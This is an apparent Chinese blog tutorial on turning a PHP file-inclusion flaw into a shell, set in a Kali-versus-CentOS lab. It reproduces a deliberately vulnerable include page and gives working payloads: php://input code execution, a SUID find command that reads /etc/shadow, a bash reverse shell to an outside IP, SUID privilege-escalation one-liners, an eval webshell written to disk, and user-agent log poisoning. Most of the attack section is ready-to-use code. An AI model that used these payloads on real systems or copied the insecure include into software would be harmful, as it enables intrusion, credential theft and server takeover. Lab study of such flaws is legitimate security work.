文件包含的一些getshell姿势

已于 2024-09-17 11:01:36 修改
阅读量1.1k 收藏 7
点赞数 28
分类专栏: web安全 文章标签: web安全 php
于 2024-09-17 10:59:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46461268/article/details/142312081
版权

一、环境搭建

攻击机:kali

IP地址:192.168.0.13

靶机:Centos

IP地址:192.168.0.20

实验使用源代码如下

<html>
<body>
<h1>请选择数字</h1>
<form action="?page=<?php $file = $_GET[ 'page' ];
echo $file; ?>" method="GET">
	<select name="page">
        <option value="1.php">1</option>
        <option value="2.php">2</option>
        <option value="3.php">3</option>
    </select>
    <input type="submit" , value="提交">
</form>

<?php
$file = $_GET[ 'page' ];
include $file;
?>

二、实验步骤

1.扫描端口开放web端口

PHP中文件包含函数有以下四种:

require() // 只在执行到此函数时才去包含文件,若包含的文件不存在产生警告,程序继续运行

require_once() // 如果一个文件已经被包含过,则不会在包含它

include() // 程序一运行文件便会包含进来,若包含文件不存在产生致命错误,程序终止运行

include_once() // 如果一个文件已经被包含过,则不会在包含它

测试方法为是否可以通过用户控制,包含其他恶意文件,导致了执行访问了非预期的文件。

这里列下一些常见的列表

  1. 根目录

    • /etc/passwd(用于Linux系统用户信息)
    • /etc/hosts(域名到IP地址映射)

  2. Web应用目录

    • index.php
    • config.php
    • header.php
    • footer.php

  3. 日志文件

    • /var/log/apache2/access.log
    • /var/log/apache2/error.log
    • /var/log/nginx/access.log

  4. 系统配置文件

    • /proc/self/environ
    • /proc/version

  5. Windows系统文件(如果目标是Windows):

    • C:\Windows\win.ini
    • C:\Windows\System32\drivers\etc\host

这里尝试包含成功访问

这里开始尝试getshell

这里我们使用php://input

php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。从而导致任意代码执行。

例如:
http://127.0.0.1/cmd.php?cmd=php://input
POST数据:<?php phpinfo()?>
注意:
当enctype="multipart/form-data"的时候 php://input` 是无效的

遇到file_get_contents()要想到用php://input绕过。

这里我们的思路可以放开多用几种姿势getshell

(一) 提权

发现find命令

touch abc

find abc -exec whoami \;

我们当前用户没有写入权限所以我们查询1.php

<?php system("find 1.php -exec cat /etc/shadow \;");?>

(二) 反弹shell
<?php 
system('/bin/bash -c "bash -i >& /dev/tcp/192.168.107.115/9999 0>&1"');
?>

提权姿势

find / -perm -u=s -type f 2>/dev/null //查找suid命令

find / -perm -g=s -type f 2>/dev/null //查找sgid文件

find . -exec /bin/sh -p \; -quit

(三) 写马子

这些环境都是为了能看到一个终端

写入一句话木马

使用单引号'包裹外部字符串,可以避免PHP解析器混淆。

在字符串内部,使用反斜杠\对引号进行转义,确保嵌套的引号能够正确解析。

<?php 
  system('echo "<?php eval(\$_POST[\"cmd\"]); ?>" > 7.php'); 
?>

使用蚁剑连接

或者通过find写入木马

<?php
system('find 1.php -exec sh -c \'echo "<?php eval(\\$_POST[\\"cmd\\"]); ?>" > 11.php\' \;');

<?php
system('find 1.php -exec chmod 777 11.php \;');
?>

(四) user-angnt注入

为了实验我们适当的更改权限

#centos 下默认路径

/var/log/nginx/access.log

/var/log/httpd/access_log

#ubuntu下默认路径

/var/log/apache2/access.log

/var/log/nginx/access.log

通过观察可以发现目标日志系统会将user-angnt记录

我们在可在ua头里写入马子

明弟有理想
关注
专栏目录
php文件包含getshell
Jiajiajiang_的博客
07-11 5599
今天面试被问到这个了,已经是很久以前用到了,脑子一时短路,一点也想不起来,今天想捋一遍 参考 文件包含是应用程序(在这里就是指php函数引入文件时)未对要引用的文件做合理的校验,从而恶意的使应用程序操作了意料之外的文件,将会导致文件泄露,更有甚者会导致恶意代码的注入。 先介绍一下本地文件包含LFI(Local File Include) 举个最简单的例子,新建一个php文件,命...
GetShell姿势总结
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
03-20 4333
0x00 什么是WebShell 渗透测试工作的一个阶段性目标就是获取目标服务器的操作控制权限,于是WebShell便应运而生。Webshell中的WEB就是web服务,shell就是管理攻击者与操作系统之间的交互。Webshell被称为攻击者通过Web服务器端口对Web服务器有一定的操作权限,而webshell常以网页脚本的形式出现。常见的WebShell使用asp、jsp和php来编写,提供了如执行系统命令、文件上传下载、数据库管理等功能。 0x01 获取WebShell的方式 获取W...
getshell姿势(三)--文件包含
qq_45936617的博客
10-06 365
文件包含是指一个文件可以包含(接入)另一个文件。常见的PHP文件包含函数为include()、require()、include_once()、require_once()。文件包含可以分为本地文件包含远程文件包含。本地文件包含只能对服务器本地文件进行包含;远程文件包含可以通过URL地址包含其他服务器的内容。在PHP环境中,远程文件包含需要的条件为allow_url_include、allow_url_fopen为开启状态:on。
浅析php文件包含及其getshell姿势
weixin_50464560的博客
05-29 1923
0x1 前言  不管平时在打ctf或者代码审计的过程中,文件包含都是很薄弱、很常见的点,一般的开发人员可能觉得文件包含没有什么大问题,低估其造成的危害,我一个ctf爱好者也是这么认为的,直到最近打了几场ctf都出现了文件包含的点,然后被暴虐,才发现文件包含的利用面很广,所以就此打算写篇文章来记录下自己的学习过程。 0x2 认识和了解包含函数  PHP里面共有4个与文件包含相关的函数,分别是: include require include_once require_once 查看相关函数的文档了解他们
文件包含漏洞-04】经典面试题:已知某网站仅存在本地文件包含漏洞时,如何GetShell
m0_64378913的博客
06-23 1226
实验要求:假设攻击者已经知道某网站存在且仅存在本地文件包含漏洞,并且没有文件上传漏洞点及其他漏洞,如何GetShell。 实验目的:利用本地文件包含漏洞GetShell。(1)靶机本文实验基于WAMP环境进行测试,环境部署过程参考文章《【语言环境】WAMP环境部署及优化—以win2008R2SP1为操作系统》,IP为172.16.1.1。查看靶机PHP版本。需要查看所搭建的服务器的PHP版本,下一步修改其配置。打开phpstudy安装文件夹,找到PHP-5.4.45版本对应文件夹,将文件php.ini中的a
文件包含漏洞04】当服务器仅存在本地文件包含漏洞时,如何GetShell
Fighting_hawk的博客
03-11 4736
1. 思路:第一步利用一切可能让服务器本地某个文件中含有一句话木马;第二步文件包含之让代码执行。 2. 思考:如果错误日志不是在默认位置,应该如何找到或者是否有其他途经? 3. 思考:如果靶机存在远程文件包含漏洞,攻击者在服务器2号上写一个一句话木马文件,利用靶机远程文件包含该文件,并不能Get靶机Shell。后续应更加深入理解一句话木马的控制原理,以判断为什么无法实现,初步认为shell代码是在服务器2号上执行的。...
PHP文件包含漏洞代码分析-通过漏洞getshell-学习笔记
ZhangAweio的博客
04-06 801
假设我们有一个网站有上传漏洞,但我们并不能进行直接getshell,这时候我们就用到这漏洞来进行getshell假如我们有个网站已经成功上传shell 了,但是无法运行,因为是其他格式的那么我们可以通过文件包含漏洞来进行getshell首先写入一句话木马成功访问不是PHP结尾的文件,文件包含漏洞危害及其大,如有被利用不堪设想。
文件包含漏洞结合ssh登录日志getshell
weixin_54813510的博客
06-26 751
文件包含(漏洞)是程序开发人员通常出于灵活性的考虑,会将被包含的文件设置成变量,然后动态调用这些文件。但正是因为调用的灵活性导致用户可能调用一些恶意文件,造成文件包含漏洞。文件包含漏洞分为本地文件包含漏洞和远程文件包含漏洞。php文件包含的函数有:require(),找不到被包含的文件时会产生致命错误,并停止脚本运行。include(),找不到被包含的文件时只会产生警告,脚本将继续运行。include_once()与include()类似,唯一区别是如果该文件中的代码已经被包含,则不会再次包含。
GetShell姿势总结1
08-03
【GetShell姿势总结1】 在网络安全领域,尤其是渗透测试中,GetShell是指获得目标服务器的控制权限,这通常是通过WebShell实现的。WebShell是一种利用Web服务器漏洞部署的恶意脚本,它允许攻击者通过Web接口与操作...
dede ad_js.php getshell,nday漏洞还原分析之dedecms后台getshell
weixin_34151001的博客
03-29 527
前言最近发现 dedecms 的 nday后台getshell ,于是打算还原一下。根据日志显示,攻击者访问了 dede/ad_add.php 文件后,转而访问 plus/ad_js.php 文件,提交的 payload 为 plus/ad_js.php?nocache=1&aid=1&_=whoami 。前期准备我们先来看一下 dede/ad_add.php 文件。可以看到这是一...
漏洞复现之Tomcat后台War包上传Getshell
Blood_Pupil的博客
03-19 7203
注意标题,后台War包上传Getshell!这种方法的利用上下文是你已经能够登录Tomcat的管理后台,注意是Tomcat的管理后台而不是Web应用程序的后台!本文章一切演示以vuln提供的漏洞环境为例 Tomcat后台 使用本文所描述的技能的前提是先进入Tomcat的管理后台,那么Tomcat管理后台的URI你知道吗?有哪些限制阻止你登录后台,你知道吗?正所谓知己知彼百战不殆,那不如我们首先...
getshellPhpmyadmin写日志
MoCoCN的博客
08-30 679
@MoCoCN Phpmyadmin写日志getshell 当初接触渗透测试的时候getshell就会个文件上传,后来随着工作学到的知识越来越多,慢慢的getshell姿势也慢慢的学到了些,这次给大家分享一个很常见也很基础的getshell的方式。如有什么不严谨的地方,还望大佬指点。 1.准备环境 一台装有Phpstudy(mysql>5.0)的服务器 中国蚁剑 2.开启phpstudy 3.访问服务器phpmyadmin页面 4.弱口令root root登录进去,点击SQL,执行sql语句 查
PHP文件包含利用phpinfo写入shell
qq_63489512的博客
07-11 960
服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当php文件来执行,这会为开发者节省大量的时间。这意味着可以创建供所有网页应用的标准页眉或者菜单文件。当页眉需要更新时,只需更新一个包含文件就可以了。当遇到PHP文件包含漏洞时,如果找不到可以包含的文件,可以通过包含临时文件来GetShell。由于临时文件的文件名是随机的,如果目标网站存在phpinfo,则可以通过phpinfo来获取临时文件名,进而完成包含。
PHP文件包含漏洞复现
春日野穹
09-17 3062
引言~ 老规矩,介绍一波原理先 PHP文件包含原理: 文件包含漏洞的产生原因是在通过 PHP 的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 php 中引发文件包含漏洞的通常是以下四个函数: 1、include() 当使用该函数包含文件时,只有代码执行到 include() 函数时才将文件包含进来,发生错误时只给出一个...
Oracle的getshell命令执行的实战(有版本限制)
weixin_50464560的博客
02-05 5871
文章中涉及到的漏洞均已提交,渗透测试需规范!这是个人认为近期比较有价值的一次渗透测试,分享给大家。主要分为4个步骤:弱口令进入系统;后台sql注入;getshell远程RDP管理员登录;扩大战果,证明危害。0x01 弱口令在一次针对某站点信息收集的过程中,通过子域名扫描,扫描到某个老旧系统。一看这都2014年的老站了,肯定有搞头!日常使用burp爆破一波试试,没爆破出来但是随手一试,好家伙123/123进入系统,属于是运气拉满了(高强度打码)这里能看到是一个“编辑”人员的权限,并没有什么上传等后台管理的功
网站渗透总结之Getshell用法大全
LinkSLA的博客
11-07 2673
后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库
php文件包含及利用其getshell
wh11te的博客
07-26 1478
0x1 php中与包含有关的函数 php中一共有4个文件包含相关的函数,分别为: include 如果未找到文件,发出警告,继续执行。 require 如果未找到文件,发出致命错误,停止执行。 include_once 与include相同,只包含一次。 require_once 与require相同,只包含一次。 ...
PHP文件包含及使用伪协议getshell
weixin_30883271的博客
07-05 534
file://— 访问本地文件系统 http://— 访问 HTTP(s) 网址 ftp://— 访问 FTP(s) URLs php://— 访问各个输入/输出流(I/O streams) zlib://— 压缩流 data://— 数据(RFC 2397) glob://— 查找匹配的文件路径模式 phar://— PHP 归档 ssh2://— Secu...
后台文件上传getshell漏洞怎么解决漏洞
最新发布
06-29
后台文件上传中的 GETshell 漏洞通常发生在服务器处理文件上传请求时,如果未正确验证上传文件类型、大小或内容,恶意用户可能会上传包含恶意脚本的文件,这些脚本可以在服务器上执行,从而获取系统的控制权(shell...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

明弟有理想

觉得有帮助可以投喂下博主~感谢

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值